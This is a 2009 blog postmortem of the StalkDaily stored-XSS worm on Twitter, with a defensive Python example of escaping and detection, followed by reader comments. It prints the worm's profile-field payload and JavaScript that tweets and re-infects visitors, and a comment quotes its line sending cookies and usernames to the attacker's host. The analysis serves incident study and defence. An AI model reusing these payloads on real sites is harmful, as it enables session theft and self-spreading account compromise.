Twitter StalkDaily Worm Postmortem

Twitter got hit with a little security incident this afternoon we’ll call the “StalkDaily Worm”. I have no clue if the StalkDaily site was actually associated with the worm at this point or if it was simply a misdirection. I believe it to be the latter.

At around 3:43pm PST this afternoon I noticed some odd updates from a couple of my friends regarding the StalkDaily site. I then saw this tweet from @JoeCascio:

First virus-like hack of Twitter is StalkDaily.com. Looks like a code injection in the Location field of your profile.

Coming from Joe, I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js>"

The script tag tacked onto the end of the anchor is the particularly bad part and is what was getting injected into people’s profiles. Taking a quick look at the JavaScript that it actually links to, there were a few lines in particular that caught my eye:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :) ");
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

What’s happening here is that somebody realized they could save URL-encoded data to the profile URL field that was not properly escaped when re-displayed (a stored cross-site scripting bug). This is particularly nasty because you could get infected simply by viewing the Twitter profile page of somebody who was already infected. If you visited an infected profile while logged in, the JavaScript in the profile would execute, tweet the misleading link, and update your own profile with the same malicious JavaScript, thereby infecting anybody who then visited your profile on twitter.com.
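To make the bug class concrete, here is an added example (not Twitter’s code or the worm author’s) that renders a stored profile URL the vulnerable way beside a hardened version, and includes a simple scan over stored values of the kind a site operator could run to find already-infected profiles. The payload constant is the worm’s `xss` value from the post as it would look after URL-decoding; `render_vulnerable`, `render_safe`, `is_valid_profile_url` and `profile_looks_infected` are hypothetical names.

```python
import html
from urllib.parse import urlsplit

# The worm's `xss` variable from the post, as stored after Twitter URL-decoded
# the POST body. Constructed here from the page's own excerpt.
WORM_PROFILE_URL = ('http://www.stalkdaily.com"></a>'
                    '<script src="http://mikeyylolz.uuuq.com/x.js"></script>'
                    '<script src="http://mikeyylolz.uuuq.com/x.js"></script><a ')


def render_vulnerable(profile_url: str) -> str:
    """The bug class the post describes: the stored value is interpolated into
    the href attribute without escaping, so a double quote closes the attribute
    and the rest of the string becomes live markup."""
    return '<a href="%s"/>' % profile_url


def is_valid_profile_url(profile_url: str) -> bool:
    """Input validation: accept only an absolute http(s) URL with a host and none
    of the characters that can close an attribute or open a tag."""
    if any(ch in profile_url for ch in '"\'<>'):
        return False
    parts = urlsplit(profile_url)
    return parts.scheme in ('http', 'https') and bool(parts.netloc)


def render_safe(profile_url: str) -> str:
    """Hardened rendering: validate first, then HTML-escape the attribute value
    (quote=True also escapes both quote characters) so it cannot leave the
    attribute even if validation is later loosened."""
    if not is_valid_profile_url(profile_url):
        return '<a href="#"/>'  # hypothetical fallback: drop the link, keep the page
    return '<a href="%s"/>' % html.escape(profile_url, quote=True)


def profile_looks_infected(profile_url: str) -> bool:
    """Defender-side check over stored profile URLs: a legitimate URL never
    carries markup, so any tag fragment flags the row for cleanup."""
    lowered = profile_url.lower()
    return '<script' in lowered or '</a>' in lowered


if __name__ == '__main__':
    print('vulnerable:', render_vulnerable(WORM_PROFILE_URL))
    print('safe:      ', render_safe(WORM_PROFILE_URL))
    print('infected?  ', profile_looks_infected(WORM_PROFILE_URL))
```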

This was a nasty little script.

This is also one of the reasons that I browse the web with NoScript. It’s a hassle, sure, but it prevented the script from an untrusted domain (uuuq.com) from running on Twitter.com.

As we’ve seen with worms in the past, this attack was loud and noisy and all the attackers did was collect your Twitter username and cookie. Had they been playing for real, a more profitable approach would have been to leave your profile URL intact and insert some JavaScript that turned your browser into an endpoint on a bot network. </doomandgloom>

It looks like Twitter has already taken care of the issue for the most part. Thanks to @al3x and crew for their near-instant response on what was likely a nice relaxing Saturday afternoon.

If you have the stalkdaily URL in your profile, you were likely attacked by this issue. Twitter has taken care of it at this point, so feel free to correct your URL and continue with your Saturday evening Twittering. There’s some more information on this post.

Be safe out there – the Internet is a dangerous place. :)

Update (2009-04-12): A brief update – another round of the worm hit Twitter on Sunday morning. It was effectively the same thing, but attacked a different field. The code, oddly enough, had also been run through an obfuscator. You can see the partially obfuscated code from the second worm here: second version of worm.

Written on: 04-11-09 · 54 Comments

54 Responses to “Twitter StalkDaily Worm Postmortem”

  1. Joe Cascio wrote:

    Hey Damon,
    I was hoping you’d get to the bottom of this exploit and write it up. Thanks!! And as you say… “Let’s be careful out there!”

    April 11th, 2009 at 5:34 pm
  2. Ed wrote:

    Thinking team twitter did well.

    I’d like to see the deer ticks that launched this exploit doing the backstroke off Somalia

    April 11th, 2009 at 7:01 pm
  3. Pierre Fontenelle wrote:

    Good stuff, I’ve been posting that notice of the code being web address related on a number of blogs and tweets.

    I think it’s a shame stalkdaily.com automatically gets the blame for this thing when the worm could’ve easily “promoted” myspace, facebook, your blog, or any other website of choosing.

    April 11th, 2009 at 7:17 pm
  4. Rob Nelson (guruvan) wrote:

    @a3lx and crew did well shutting down the worm

    Whoever was “in charge” of informing the tweeple was nowhere to be found. There’s no excuse for twitter having failed to post a notice to status.twitter.com about this incident. It should have been posted immediately, with any details and corrective measures that twitter was taking and that users should have taken. It should have been updated as soon as the situation progressed.

    But it’s no surprise. Twitter doesn’t really care about its users. A few great people inside twitter (like @a3lx) do care, but that doesn’t help the users to know anything. The users of twitter are left in the dark hunting for answers.

    In fact, as I write this, I am still inundated with user questions about what happened, how to know if they are infected, and what to do if they are.

    I said it on Mashable’s page, and I’ll say it here: It was TOTALLY IRRESPONSIBLE of Twitter to leave their users in the dark.

    April 11th, 2009 at 7:26 pm
  5. Damon wrote:

    Rob,

    I agree Twitter does need a more effective means of notifying their users in situations like this. While perhaps abusive of the mentions functionality, I @’ed some Twitter team members a couple times as I wasn’t sure if they were aware of it or not.

    Of course as I write this @twitter makes an update. ;)

    http://status.twitter.com/post/95332007

    April 11th, 2009 at 7:34 pm
  6. Rob Nelson (guruvan) wrote:

    Damon,

    In an incident like this, I think that your use of the @mention facility is exactly correct. I don’t have a lot of the team members’ names, but I sure @’ed #ev and #biz a few times (and at least @netik)

    And how can you be sure if they’re aware unless someone updates the status page? Just a simple mention cuts the volume down considerably. (I do speak from first hand experience of running a TechOps department of a very public new technology site)

    April 11th, 2009 at 8:48 pm
  7. Lee wrote:

    It looks like a 17 year old boy has admitted to being behind the worm : http://www.bnonews.com/news/242.html

    April 12th, 2009 at 1:03 am
  8. Latest Antivirus Updates » Twitter worm outbreak over Easter wrote:

    [...] More info on the technical internals of the attack are available at dcortesi.com. [...]

    April 12th, 2009 at 1:55 am
  9. David Jackmanson wrote:

    Thanks for the tech info. It appears that stalkdaily.com is hosted by Dreamhost and uuuq.com is hosted by GoDaddy. I’ve contacted them both asking them to remove “Mikeyy”’s accounts:

    http://letstakeover.blogspot.com/2009/04/fight-back-against-stalkdaily-and-its.html

    April 12th, 2009 at 4:10 am
  10. Twitter Worm Causes Uncontrolled Tweeting | WCZone Web Design! | Akron Ohio Website Design - Akron Web Development, Cleveland Web Design, Business Website,Web Programming, Akron, Summit County - Services Cuyahoga Falls Website Design Web Development, Busi wrote:

    [...] technical detail on the attack is available at dcortesi.com. Twitter is reporting that they have already taken care of the problem, but still it’s probably a [...]

    April 12th, 2009 at 5:10 am
  11. Brandon Paddock wrote:

    Did IE8’s XSS Filter help protect against this?

    April 12th, 2009 at 7:09 am
  12. Technology News » Twitter worm “StalkDaily” launched, spread, defeated wrote:

    [...] a technical explanation of what was going on, I refer you to Damon Cortesi’s Twitter StalkDaily Worm Postmortem. An easy way to check to see if you’ve been infected is to search twitter for “{your [...]

    April 12th, 2009 at 7:35 am
  13. Twitter Vulnerability: Mutating Fast and More on the Way | Spin Valley Post wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 9:29 am
  14. We Love Crowds » Twitter Vulnerability: Mutating Fast and More on the Way wrote:

    [...] left a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 9:48 am
  15. Twitter Vulnerability: Mutating Fast and More on the Way | thekevinpipe.com wrote:

    [...] left a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 9:48 am
  16. Technic News » Twitter Vulnerability: Mutating Fast and More on the Way wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 9:58 am
  17. Ingrid Alongi wrote:

    Awesome write-up!

    April 12th, 2009 at 10:32 am
  18. DCortesi . blog » Twitter StalkDaily Worm Postmortem | My Maine wrote:

    [...] You can read the full story here. Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages. [...]

    April 12th, 2009 at 10:38 am
  19. Twitter Vulnerability: Mutating Fast and More on the Way | Programming Blog wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 11:02 am
  20. Awakened by Mikeyy. Little punk. « Work That Web wrote:

    [...] http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ [...]

    April 12th, 2009 at 1:17 pm
  21. UnderForge of Lack » Blog Archive » Twitter cultivate worm and they spread over Easter wrote:

    [...] Python – Spam The usual JavaScript-based cross-site lure: Twitter StalkDaily Worm Postmortem script src=”hxxp://mikeyylolz.uuuq.com/x.js 212.95.49.251 NETDIRECT-NET-DEDISERV (Poland) [...]

    April 12th, 2009 at 2:45 pm
  22. Twitter Vulnerability: Mutating Fast and More on the Way | New Web 2.0 Magazine wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi blog. Clearly Mikeyy is still bored as the new version is now making its way across the [...]

    April 12th, 2009 at 3:03 pm
  23. Interesting Information Security Bits for 04/12/2009 | Infosec Ramblings wrote:

    [...] has a nice description of one of the worms that hit Twitter this weekend. DCortesi . blog >> Twitter StalkDaily Worm Postmortem Tags: ( twitter worm [...]

    April 12th, 2009 at 4:29 pm
  24. Vulnerable Twitter: Virus Variants Running Rampant - ReadWriteWeb’s only official Chinese site - Sohu IT independent group blog wrote:

    [...] view it on GitHub; for a “postmortem” of the vulnerability that was attacked yesterday, see DCortesi [...]

    April 12th, 2009 at 7:17 pm
  25. StalkDaily worm hits Twitter « kpowerinfinity wrote:

    [...] Comment! Found a full post mortem of the latest worm to hit the Social Media scene – StalkDaily. Very interestingly, twitter allowed to add script tags in their profile, and 17-year old Mickeyy Mooney employed a cross-site scripting attack to not just post an update promoting his own site StalkDaily.com, but also added the same malicious javascript on the profile pages of who-ever visited an infected page. The modus operandi of the attack is described in more detail here. [...]

    April 12th, 2009 at 7:23 pm
  26. Vulnerable Twitter: Virus Variants Running Rampant « Daily IT News, the latest IT information, aggregating news from many sites, keeping you in sync with the world wrote:

    [...] view it on GitHub; for a “postmortem” of the vulnerability that was attacked yesterday, see DCortesi [...]

    April 12th, 2009 at 7:59 pm
  27. ArticleSave :: Uncategorized :: Twitter Vulnerability: Mutating Fast and More on the Way wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 12th, 2009 at 10:06 pm
  28. Twitter Worm - flyingpenguin wrote:

    [...] has posted a nice summary of a script exploit in Twitter I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily [...]

    April 12th, 2009 at 10:25 pm
  29. Twitter Vulnerability: Mutating Fast and More on the Way | google android os blog wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 13th, 2009 at 12:17 am
  30. hackademix.net » Mikeyy's StalkDaily Twitter Worm vs NoScript wrote:

    [...] StalkDaily.com. A good technical description of its rather simple inner workings has been kindly provided by Damon Cortesi. As you can see, unless the mikeyylolz.uuuq.com doman is allowed to run JavaScript (very unlikely [...]

    April 13th, 2009 at 3:27 am
  31. Tech Sassy » Blog Archive » Security Alert: Twitter exploited by “Mikeyy” worm over weekend wrote:

    [...] an analysis of the script that it uses, check out DCortesi’s excellent blog post. Excerpt below: … it looks like somebody realized they could save url encoded data to the [...]

    April 13th, 2009 at 4:07 am
  32. Frank wrote:

    Why does the worm code send the cookie and username back to his site with:
    http://mikeyylolz.uuuq.com/x.php?c=” + cookie + “&username=” + username

    when it can update the profile and the notices using XHConn()?

    is that just to prove a point?

    April 13th, 2009 at 6:35 am
  33. dmangstar564 wrote:

    I’ll be one to say it, thank god this was written by a script kiddie and not someone who actually had malicious intentions.

    April 13th, 2009 at 7:01 am
  34. Damon wrote:

    Frank,

    Maybe the worm author wanted a) a record of who had been compromised and b) the potential to re-inject or compromise those accounts again if the profile code got removed?

    Or c) because he was bored and that’s what all the other worms do.

    b) is interesting because say somebody with a large number of followers gets infected. They will be notified quickly and fix their profile, but imagine how frustrating it would be if their cookie was still valid and a simple cron job kept updating it. ;)

    April 13th, 2009 at 9:01 am
  35. Pages tagged "blog" wrote:

    [...] bookmarks tagged blog DCortesi . blog » Twitter StalkDaily Worm Postmor… saved by 3 others     gli0444 bookmarked on 04/13/09 | [...]

    April 13th, 2009 at 10:48 am
  36. WarGame’s Blog » Blog Archive » Yet an other XSS worm wrote:

    [...] seems that a XSS worm is spreading among twitter users … here more [...]

    April 13th, 2009 at 12:12 pm
  37. “Lost in the Noise” - Security Research Weblog » Blog Archive » Twitter hit by worm attack wrote:

    [...] any involvement in the attack and says it was itself the victim of hackers. Further analysis of the attack shows that the attackers had succeeded in getting script from another website onto [...]

    April 14th, 2009 at 12:32 am
  38. Jonathan Wagener wrote:

    @Ed, but you guys are supposed to make it impossible for the guy to exploit you. I would’ve thought this a simple thing to handle. You don’t think that a hacker with such a great exploit is just going to let it go by without using it :)

    great write up by the way.

    April 14th, 2009 at 2:41 am
  39. stalkdaily.com wrote:

    [...] Worm [4] Twitter worm “StalkDaily” launched, spread, defeated | ITworld [5] DCortesi . blog ” Twitter StalkDaily Worm Postmortem [6] Techmeme: Update on StalkDaily.com Worm (Twitter [...]

    April 14th, 2009 at 4:26 am
  40. Twitter worm outbreak over Easter - All About Virus wrote:

    [...] More info on the technical internals of the attack are available at dcortesi.com. [...]

    April 14th, 2009 at 5:40 pm
  41. Twitter Vulnerability: Mutating Fast and More on the Way - Indometric wrote:

    [...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]

    April 18th, 2009 at 9:00 pm
  42. Explanation of How My Twitter Account Was Hacked | Sue Waters Blog wrote:

    [...] fought off four waves of worm attacks created by Mikeyy Mooney.  Damon Cortesi wrote an excellent postmortem post that explains exactly how the worm worked and what code was [...]

    April 19th, 2009 at 7:45 am
  43. Twitter: Under attack | IT Security | TechRepublic.com wrote:

    [...] also become infected just by looking at an compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at the worm [...]

    April 21st, 2009 at 2:45 am
  44. The Ashes » Blog Archive » Twitter: StalkDaily/Mikeyy worm wrote:

    [...] also become infected just by looking at a compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at how the worm [...]

    April 25th, 2009 at 12:48 pm
  45. Jake Kasprzak Online › The Twitter XSS Worm and Lessons That Can Be Learned From It wrote:

    [...] This worm infected the profiles of Twitter users so that they contained malicious code. Logged-in Twitter users who would view one of these infected profiles would then, through execution of the JavaScript injected into these profiles via an XSS hole, have their own profiles infected with the same code. Therefore, propagation of this worm occurred via logged-in Twitter users simply viewing infected profiles. The source code used by this worm can be viewed here. As one can see by viewing this source code that is called from infected Twitter pages, it injects the malicious script and other data that would appear in profiles when they are infected with this worm. Damon Cortesi gives a good analysis of the worm here. [...]

    April 27th, 2009 at 3:50 pm
  46. Security Justice » Blog Archive » Security Justice - Episode 12 wrote:

    [...] Twitter StalkDaily Worm Postmortem [...]

    May 3rd, 2009 at 6:24 pm
  47. Web API and security wrote:

    [...] Mikeyy worm: a 17-year-old youth, Michael Mooney, became famous within a few hours by creating a worm that exploited poor filtering of incoming messages. [...]

    June 16th, 2009 at 8:35 am
  48. 5 XSS Exploits You Should Know About (& how to prevent them) | Deadly Technology wrote:

    [...] and executed consistently. An excellent example of stored cross site scripting is the recent Mikeyy Stalk Daily worm attack on Twitter. Mikeyy’s code was stored in the profile data for twitter users and was subsequently [...]

    June 19th, 2009 at 7:35 am
  49. SChalice wrote:

    “Thinking team twitter did well.”

    Thinking they are foolish.

    July 22nd, 2009 at 12:41 pm
  50. Twitter: Under attack | tempebasah media wrote:

    [...] also become infected just by looking at a compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at how the worm [...]

    August 7th, 2009 at 12:33 am
  51. Week 3 « Week3 Enterprise 2.0 wrote:

    [...]  An additional interesting blog is about about Twitter black-out that happened couple of days ago, the user explains in detail what really happened to Twitter becoming unavailable.http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ [...]

    August 11th, 2009 at 11:34 pm
  52. Hamachi on Twitter « Information Security Memorandum wrote:

    [...] on Twitter The details are around here and here. Everyone seems to be having fun, though… [...]

    September 24th, 2009 at 8:57 pm
  53. Explanation of How My Twitter Account Was Hacked | The Aggregator wrote:

    [...] fought off four waves of worm attacks created by Mikeyy Mooney.  Damon Cortesi wrote an excellent postmortem post that explains exactly how the worm worked and what code was [...]

    October 8th, 2009 at 3:43 am
  54. Twitter Worm Outbreak Over Easter – Security Threat Research News wrote:

    [...] More info on the technical internals of the attack are available at dcortesi.com. [...]

    December 12th, 2009 at 4:11 am